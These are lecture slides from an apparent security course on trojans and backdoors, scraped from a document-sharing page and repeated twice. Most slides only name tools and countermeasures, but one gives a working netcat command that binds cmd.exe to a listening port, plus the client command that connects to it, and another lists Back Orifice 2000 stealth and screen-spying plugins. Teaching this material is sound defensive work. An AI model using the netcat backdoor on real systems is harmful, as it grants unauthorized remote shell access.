Week 6: Trojans and Backdoors What is a Trojan Horse?

Yüklə 468 b.

tarix	14.10.2017
ölçüsü	468 b.
	#4674

Week 6: Trojans and Backdoors

What is a Trojan Horse?
Overt and Covert

Week 6: Trojans and Backdoors

Hacking Tool: QAZ
Hacking Tool: Tini
Hacking Tool: Netcat

Netcat in Action as Backdoor

Remote command prompt anyone?
On a Windows NT server issue the following command in the directory that contains netcat:
nc -l -p1234 -d -e cmd.exe –L
This –l puts netcat into listen mode, the -p1234 tells netcat to use port 1234, the –d allows netcat to run detached from the console, the –e cmd.exe tells netcat to execute the cmd.exe program when a connection is made, and the –L will restart Netcat with the same command line when the connection is terminated.
On the client system issue the following command:
nc destination 1234
This command causes netcat to connect to the server named destination on port 1234. Immediately you are given a console connection to the destination server. Be careful! To exit the remote console session type:
exit
You will be returned to your own console and will be able to reconnect to the destination server because netcat was started on the destination server with the –L option.

Week 6: Trojans and Backdoors

Hacking Tool: Donald Dick
Hacking Tool: SubSeven
Hacking Tool: BackOrifice 2000
Back Oriffice Plug-ins

Back Orifice 2000

Can be used as a Network Administrator to remotely configure its system.
It can also be used as a Trojan/Backdoor by attackers.
Can run on any filename, Uses TCP port 54320 and UDP 54321 by default but can use any other port. Can disguise itself as Explorer.exe.
Can use Strong Encryption.
Open Source.
Countermeasure:BackOfficer Friendly (nfr.net/products/bof)

Some BO2K Plugins

BOPeep- provides streaming video of the victim’s screen to attacker.
Encryption- Blowfish, CAST-256, IDEA, RC6 (stronger than most commercial systems)
BOSOCK32- Stealth capabilities using ICMP
STCPIO- stealth using encrypted flow between BO2K GUI and server.

Week 6: Trojans and Backdoors

Hacking Tool: NetBus
Wrappers

Week 6: Trojans and Backdoors

Hacking Tool: Graffiti
Hacking Tool: Silk Rope 2000
Hacking Tool: EliteWrap
Hacking Tool: IconPlus

Week 6: Trojans and Backdoors

Packaging Tool: Microsoft WordPad
Hacking Tool: Whack a Mole

Week 6: Trojans and Backdoors

Trojan Construction Kit
BoSniffer
Hacking Tool: FireKiller 2000

Week 6: Trojans and Backdoors

Covert Channels
ICMP Tunneling
Hacking Tool: Loki

Week 6: Trojans and Backdoors

Reverse WWW Shell
Backdoor Countermeasures

Week 6: Trojans and Backdoors

BO Startup and Registry Entries
NetBus Startup and Registry Keys

Week 6: Trojans and Backdoors

Port Monitoring Tools
fPort (foundstone.com)
TCPView (http://www.sysinternals.com/ntw2k/source/tcpview.shtml)
Process Viewer

Week 6: Trojans and Backdoors

Inzider - Tracks Processes and Ports (www.sans.org/y2k/finding.htm )
Trojan Maker

Week 6: Trojans and Backdoors

Hacking Tool: Hard Disk Killer
Man-in-the-Middle Attack
Hacking Tool: dsniff

Week 6: Trojans and Backdoors

System File Verification
TripWire (tripwire.com, tripwire.org)

Week 6: Trojans and Backdoors

Summary

Yüklə 468 b.

Dostları ilə paylaş:

Week 6: Trojans and Backdoors What is a Trojan Horse?

Week 6: Trojans and Backdoors

What is a Trojan Horse?

Overt and Covert

Week 6: Trojans and Backdoors

Hacking Tool: QAZ

Hacking Tool: Tini

Hacking Tool: Netcat

Netcat in Action as Backdoor

Remote command prompt anyone?

On a Windows NT server issue the following command in the directory that contains netcat:

nc -l -p1234 -d -e cmd.exe –L

On the client system issue the following command:

nc destination 1234

This command causes netcat to connect to the server named destination on port 1234. Immediately you are given a console connection to the destination server. Be careful! To exit the remote console session type:

exit

You will be returned to your own console and will be able to reconnect to the destination server because netcat was started on the destination server with the –L option.

Week 6: Trojans and Backdoors

Hacking Tool: Donald Dick

Hacking Tool: SubSeven

Hacking Tool: BackOrifice 2000

Back Oriffice Plug-ins

Back Orifice 2000

Can be used as a Network Administrator to remotely configure its system.

It can also be used as a Trojan/Backdoor by attackers.

Can run on any filename, Uses TCP port 54320 and UDP 54321 by default but can use any other port. Can disguise itself as Explorer.exe.

Can use Strong Encryption.

Open Source.

Countermeasure:BackOfficer Friendly (nfr.net/products/bof)

Some BO2K Plugins

BOPeep- provides streaming video of the victim’s screen to attacker.

Encryption- Blowfish, CAST-256, IDEA, RC6 (stronger than most commercial systems)

BOSOCK32- Stealth capabilities using ICMP

STCPIO- stealth using encrypted flow between BO2K GUI and server.

Week 6: Trojans and Backdoors

Hacking Tool: NetBus

Wrappers

Week 6: Trojans and Backdoors

Hacking Tool: Graffiti

Hacking Tool: Silk Rope 2000

Hacking Tool: EliteWrap

Hacking Tool: IconPlus

Week 6: Trojans and Backdoors

Packaging Tool: Microsoft WordPad

Hacking Tool: Whack a Mole

Week 6: Trojans and Backdoors

Trojan Construction Kit

BoSniffer

Hacking Tool: FireKiller 2000

Week 6: Trojans and Backdoors

Covert Channels

ICMP Tunneling

Hacking Tool: Loki

Week 6: Trojans and Backdoors

Reverse WWW Shell

Backdoor Countermeasures

Week 6: Trojans and Backdoors

BO Startup and Registry Entries

NetBus Startup and Registry Keys

Week 6: Trojans and Backdoors

Port Monitoring Tools

fPort (foundstone.com)

TCPView (http://www.sysinternals.com/ntw2k/source/tcpview.shtml)

Process Viewer

Week 6: Trojans and Backdoors

Inzider - Tracks Processes and Ports (www.sans.org/y2k/finding.htm )

Trojan Maker

Week 6: Trojans and Backdoors

Hacking Tool: Hard Disk Killer

Man-in-the-Middle Attack

Hacking Tool: dsniff

Week 6: Trojans and Backdoors

System File Verification

TripWire (tripwire.com, tripwire.org)

Week 6: Trojans and Backdoors

Summary